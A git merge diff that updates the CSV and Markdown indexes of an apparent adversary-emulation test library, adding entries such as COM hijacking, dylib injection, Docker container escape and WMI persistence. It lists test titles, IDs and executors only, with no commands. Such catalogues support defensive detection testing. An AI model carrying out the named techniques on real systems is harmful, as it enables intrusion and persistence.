Merge branch 'master' into 1056.001

atomics/Indexes/Indexes-CSV/index.csv

@@ -227,6 +227,7 @@ privilege-escalation,T1546.001,Change Default File Association,1,Change Default
 privilege-escalation,T1078.004,Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,gcloud
 privilege-escalation,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
 privilege-escalation,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
+privilege-escalation,T1546.015,Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell
 privilege-escalation,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
 privilege-escalation,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
 privilege-escalation,T1134.002,Create Process with Token,1,Access Token Manipulation,dbf4f5a9-b8e0-46a3-9841-9ad71247239e,powershell
@@ -241,10 +242,12 @@ privilege-escalation,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c
 privilege-escalation,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
 privilege-escalation,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
 privilege-escalation,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
+privilege-escalation,T1574.006,Dynamic Linker Hijacking,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
 privilege-escalation,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
 privilege-escalation,T1055.001,Dynamic-link Library Injection,2,WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique,8b56f787-73d9-4f1d-87e8-d07e89cbc7f5,powershell
 privilege-escalation,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
 privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh
+privilege-escalation,T1611,Escape to Host,2,Mount host filesystem to escape privileged Docker container,6c499943-b098-4bc6-8d38-0956fc182984,sh
 privilege-escalation,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
 privilege-escalation,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
 privilege-escalation,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
@@ -293,6 +296,7 @@ privilege-escalation,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task
 privilege-escalation,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
 privilege-escalation,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
 privilege-escalation,T1053.005,Scheduled Task,7,Scheduled Task Executing Base64 Encoded Commands From Registry,e895677d-4f06-49ab-91b6-ae3742d0a2ba,command_prompt
+privilege-escalation,T1053.005,Scheduled Task,8,Import XML Schedule Task with Hidden Attribute,cd925593-fbb4-486d-8def-16cbdf944bf4,powershell
 privilege-escalation,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
 privilege-escalation,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
 privilege-escalation,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
@@ -313,12 +317,15 @@ privilege-escalation,T1543.002,Systemd Service,2,"Create Systemd Service file,
 privilege-escalation,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
 privilege-escalation,T1053.006,Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
 privilege-escalation,T1053.006,Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
+privilege-escalation,T1547.003,Time Providers,1,Create a new time provider,df1efab7-bc6d-4b88-8be9-91f55ae017aa,powershell
+privilege-escalation,T1547.003,Time Providers,2,Edit an existing time provider,29e0afca-8d1d-471a-8d34-25512fc48315,powershell
 privilege-escalation,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
 privilege-escalation,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
 privilege-escalation,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
 privilege-escalation,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
 privilege-escalation,T1546.004,Unix Shell Configuration Modification,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
-privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
+privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription - CommandLineEventConsumer,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
+privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscription,2,Persistence via WMI Event Subscription - ActiveScriptEventConsumer,fecd0dfd-fb55-45fa-a10b-6250272d0832,powershell
 privilege-escalation,T1543.003,Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
 privilege-escalation,T1543.003,Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
 privilege-escalation,T1543.003,Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
@@ -459,6 +466,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,30,WinPwn - Kill the event log
 defense-evasion,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
 defense-evasion,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
 defense-evasion,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
+defense-evasion,T1574.006,Dynamic Linker Hijacking,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
 defense-evasion,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
 defense-evasion,T1055.001,Dynamic-link Library Injection,2,WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique,8b56f787-73d9-4f1d-87e8-d07e89cbc7f5,powershell
 defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
@@ -759,6 +767,7 @@ persistence,T1136.003,Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-
 persistence,T1078.004,Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,gcloud
 persistence,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
 persistence,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
+persistence,T1546.015,Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell
 persistence,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
 persistence,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
 persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
@@ -773,6 +782,7 @@ persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS
 persistence,T1136.002,Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
 persistence,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
 persistence,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
+persistence,T1574.006,Dynamic Linker Hijacking,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
 persistence,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
 persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
 persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
@@ -826,6 +836,7 @@ persistence,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f
 persistence,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
 persistence,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
 persistence,T1053.005,Scheduled Task,7,Scheduled Task Executing Base64 Encoded Commands From Registry,e895677d-4f06-49ab-91b6-ae3742d0a2ba,command_prompt
+persistence,T1053.005,Scheduled Task,8,Import XML Schedule Task with Hidden Attribute,cd925593-fbb4-486d-8def-16cbdf944bf4,powershell
 persistence,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
 persistence,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
 persistence,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
@@ -838,12 +849,15 @@ persistence,T1543.002,Systemd Service,2,"Create Systemd Service file,  Enable th
 persistence,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
 persistence,T1053.006,Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
 persistence,T1053.006,Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
+persistence,T1547.003,Time Providers,1,Create a new time provider,df1efab7-bc6d-4b88-8be9-91f55ae017aa,powershell
+persistence,T1547.003,Time Providers,2,Edit an existing time provider,29e0afca-8d1d-471a-8d34-25512fc48315,powershell
 persistence,T1505.002,Transport Agent,1,Install MS Exchange Transport Agent Persistence,43e92449-ff60-46e9-83a3-1a38089df94d,powershell
 persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
 persistence,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
 persistence,T1546.004,Unix Shell Configuration Modification,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
 persistence,T1505.003,Web Shell,1,Web Shell Written to Disk,0a2ce662-1efa-496f-a472-2fe7b080db16,command_prompt
-persistence,T1546.003,Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
+persistence,T1546.003,Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription - CommandLineEventConsumer,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
+persistence,T1546.003,Windows Management Instrumentation Event Subscription,2,Persistence via WMI Event Subscription - ActiveScriptEventConsumer,fecd0dfd-fb55-45fa-a10b-6250272d0832,powershell
 persistence,T1543.003,Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
 persistence,T1543.003,Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
 persistence,T1543.003,Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
@@ -1135,6 +1149,7 @@ execution,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c
 execution,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
 execution,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
 execution,T1053.005,Scheduled Task,7,Scheduled Task Executing Base64 Encoded Commands From Registry,e895677d-4f06-49ab-91b6-ae3742d0a2ba,command_prompt
+execution,T1053.005,Scheduled Task,8,Import XML Schedule Task with Hidden Attribute,cd925593-fbb4-486d-8def-16cbdf944bf4,powershell
 execution,T1569.002,Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
 execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
 execution,T1569.002,Service Execution,3,psexec.py (Impacket),edbcd8c9-3639-4844-afad-455c91e95a35,bash

atomics/Indexes/Indexes-CSV/linux-index.csv

@@ -58,6 +58,7 @@ privilege-escalation,T1484.002,Domain Trust Modification,1,Add Federation to Azu
 privilege-escalation,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
 privilege-escalation,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
 privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh
+privilege-escalation,T1611,Escape to Host,2,Mount host filesystem to escape privileged Docker container,6c499943-b098-4bc6-8d38-0956fc182984,sh
 privilege-escalation,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
 privilege-escalation,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
 privilege-escalation,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash

atomics/Indexes/Indexes-CSV/macos-index.csv

@@ -23,6 +23,7 @@ collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f05622
 collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash
 privilege-escalation,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
 privilege-escalation,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
+privilege-escalation,T1574.006,Dynamic Linker Hijacking,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
 privilege-escalation,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
 privilege-escalation,T1543.001,Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
 privilege-escalation,T1543.004,Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
@@ -63,6 +64,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,6,Disable LittleSnitch,62155dd
 defense-evasion,T1562.001,Disable or Modify Tools,7,Disable OpenDNS Umbrella,07f43b33-1e15-4e99-be70-bc094157c849,sh
 defense-evasion,T1562.001,Disable or Modify Tools,8,Disable macOS Gatekeeper,2a821573-fb3f-4e71-92c3-daac7432f053,sh
 defense-evasion,T1562.001,Disable or Modify Tools,9,Stop and unload Crowdstrike Falcon on macOS,b3e7510c-2d4c-4249-a33f-591a2bc83eef,sh
+defense-evasion,T1574.006,Dynamic Linker Hijacking,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
 defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
 defense-evasion,T1070.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
 defense-evasion,T1553.001,Gatekeeper Bypass,1,Gatekeeper Bypass,fb3d46c6-9480-4803-8d7d-ce676e1f1a9b,sh
@@ -145,6 +147,7 @@ persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10
 persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
 persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
 persistence,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
+persistence,T1574.006,Dynamic Linker Hijacking,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
 persistence,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
 persistence,T1543.001,Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
 persistence,T1543.004,Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -166,6 +166,7 @@ privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PR
 privilege-escalation,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
 privilege-escalation,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
 privilege-escalation,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
+privilege-escalation,T1546.015,Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell
 privilege-escalation,T1134.002,Create Process with Token,1,Access Token Manipulation,dbf4f5a9-b8e0-46a3-9841-9ad71247239e,powershell
 privilege-escalation,T1134.002,Create Process with Token,2,WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique,ccf4ac39-ec93-42be-9035-90e2f26bcd92,powershell
 privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
@@ -210,15 +211,19 @@ privilege-escalation,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task
 privilege-escalation,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
 privilege-escalation,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
 privilege-escalation,T1053.005,Scheduled Task,7,Scheduled Task Executing Base64 Encoded Commands From Registry,e895677d-4f06-49ab-91b6-ae3742d0a2ba,command_prompt
+privilege-escalation,T1053.005,Scheduled Task,8,Import XML Schedule Task with Hidden Attribute,cd925593-fbb4-486d-8def-16cbdf944bf4,powershell
 privilege-escalation,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
 privilege-escalation,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
 privilege-escalation,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
 privilege-escalation,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
 privilege-escalation,T1547.009,Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
 privilege-escalation,T1547.009,Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
+privilege-escalation,T1547.003,Time Providers,1,Create a new time provider,df1efab7-bc6d-4b88-8be9-91f55ae017aa,powershell
+privilege-escalation,T1547.003,Time Providers,2,Edit an existing time provider,29e0afca-8d1d-471a-8d34-25512fc48315,powershell
 privilege-escalation,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
 privilege-escalation,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
-privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
+privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription - CommandLineEventConsumer,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
+privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscription,2,Persistence via WMI Event Subscription - ActiveScriptEventConsumer,fecd0dfd-fb55-45fa-a10b-6250272d0832,powershell
 privilege-escalation,T1543.003,Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
 privilege-escalation,T1543.003,Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
 privilege-escalation,T1543.003,Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
@@ -545,6 +550,7 @@ persistence,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79
 persistence,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
 persistence,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
 persistence,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
+persistence,T1546.015,Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell
 persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
 persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
@@ -586,15 +592,19 @@ persistence,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f
 persistence,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
 persistence,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
 persistence,T1053.005,Scheduled Task,7,Scheduled Task Executing Base64 Encoded Commands From Registry,e895677d-4f06-49ab-91b6-ae3742d0a2ba,command_prompt
+persistence,T1053.005,Scheduled Task,8,Import XML Schedule Task with Hidden Attribute,cd925593-fbb4-486d-8def-16cbdf944bf4,powershell
 persistence,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
 persistence,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
 persistence,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
 persistence,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
 persistence,T1547.009,Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
 persistence,T1547.009,Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
+persistence,T1547.003,Time Providers,1,Create a new time provider,df1efab7-bc6d-4b88-8be9-91f55ae017aa,powershell
+persistence,T1547.003,Time Providers,2,Edit an existing time provider,29e0afca-8d1d-471a-8d34-25512fc48315,powershell
 persistence,T1505.002,Transport Agent,1,Install MS Exchange Transport Agent Persistence,43e92449-ff60-46e9-83a3-1a38089df94d,powershell
 persistence,T1505.003,Web Shell,1,Web Shell Written to Disk,0a2ce662-1efa-496f-a472-2fe7b080db16,command_prompt
-persistence,T1546.003,Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
+persistence,T1546.003,Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription - CommandLineEventConsumer,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
+persistence,T1546.003,Windows Management Instrumentation Event Subscription,2,Persistence via WMI Event Subscription - ActiveScriptEventConsumer,fecd0dfd-fb55-45fa-a10b-6250272d0832,powershell
 persistence,T1543.003,Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
 persistence,T1543.003,Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
 persistence,T1543.003,Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
@@ -853,6 +863,7 @@ execution,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c
 execution,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
 execution,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
 execution,T1053.005,Scheduled Task,7,Scheduled Task Executing Base64 Encoded Commands From Registry,e895677d-4f06-49ab-91b6-ae3742d0a2ba,command_prompt
+execution,T1053.005,Scheduled Task,8,Import XML Schedule Task with Hidden Attribute,cd925593-fbb4-486d-8def-16cbdf944bf4,powershell
 execution,T1569.002,Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
 execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
 execution,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt

atomics/Indexes/Indexes-Markdown/index.md

@@ -341,6 +341,7 @@
 - [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md)
   - Atomic Test #1: COM Hijacking - InprocServer32 [windows]
   - Atomic Test #2: Powershell Execute COM Object [windows]
+  - Atomic Test #3: COM Hijacking with RunDLL32 (Local Server Switch) [windows]
 - [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md)
   - Atomic Test #1: ListCronjobs [containers]
   - Atomic Test #2: CreateCronjob [containers]
@@ -367,6 +368,7 @@
 - [T1574.006 Dynamic Linker Hijacking](../../T1574.006/T1574.006.md)
   - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
   - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
+  - Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos]
 - [T1055.001 Dynamic-link Library Injection](../../T1055.001/T1055.001.md)
   - Atomic Test #1: Process Injection via mavinject.exe [windows]
   - Atomic Test #2: WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique [windows]
@@ -375,6 +377,7 @@
   - Atomic Test #1: Persistance with Event Monitor - emond [macos]
 - [T1611 Escape to Host](../../T1611/T1611.md)
   - Atomic Test #1: Deploy container using nsenter container escape [containers]
+  - Atomic Test #2: Mount host filesystem to escape privileged Docker container [containers]
 - T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
